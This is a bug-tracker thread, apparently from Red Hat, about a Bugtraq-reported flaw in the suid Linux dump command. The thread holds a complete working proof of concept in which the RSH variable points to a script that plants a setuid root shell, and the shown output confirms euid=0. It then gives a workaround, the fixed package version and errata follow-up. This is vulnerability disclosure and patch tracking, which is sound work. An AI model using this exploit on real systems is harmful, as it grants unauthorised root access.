This from Bugtraq. Tested, works :( 1. Problem: Linux dump command executes external program with suid priviledge. 2. Tested Version dump-0.4b15 3. Example [mat@localhost mat]$ export TAPE=garbage:garbage [mat@localhost mat]$ export RSH=/home/mat/execute_this [mat@localhost mat]$ cat > /home/mat/execute_this #!/bin/sh cp /bin/sh /home/mat/sh chmod 4755 /home/mat/sh [mat@localhost mat]$ chmod 755 /home/mat/execute_this [mat@localhost mat]$ /sbin/dump -0 / DUMP: Connection to garbage established. DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000 DUMP: Date of last level 0 dump: the epoch DUMP: Dumping /dev/hda2 (/) to garbage on host garbage DUMP: Label: none /dev/hda2: Permission denied while opening filesystem [mat@localhost mat]$ ls -la /home/mat/sh -rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh [mat@localhost mat]$ /home/mat/sh bash# id uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
Advise for anyone who needs a quick fix: either remove the package, if you don't need it (rpm -e dump), or remove the SUID bit from /sbin/dump *and* /sbin/restore (restore(8) lists the same RSH variable).
*** Bug 20112 has been marked as a duplicate of this bug. ***
Fixed in dump-0.4b19-5.
dump-static suffers obviously from the same problem, so an errata update is needed for this package, too. Reopening.
The advisory mentiones update RPMs for dump-static and rmt, but they are not on updates.redhat.com.
19:48:40 `SRPMS/dump-0.4b19-5.6x.src.rpm' size = 166647 has new time, getting 19:48:41 `i386/dump-0.4b19-5.6x.i386.rpm' size = 88538 has new time, getting 19:48:41 `i386/dump-static-0.4b19-5.6x.i386.rpm' size = 426967 is missing, getting. 19:48:41 `i386/rmt-0.4b19-5.6x.i386.rpm' size = 12550 is missing, getting. ok, so the dump errata was re-issued, now with dump-static & rmt. Closing bug.
*** Bug 20565 has been marked as a duplicate of this bug. ***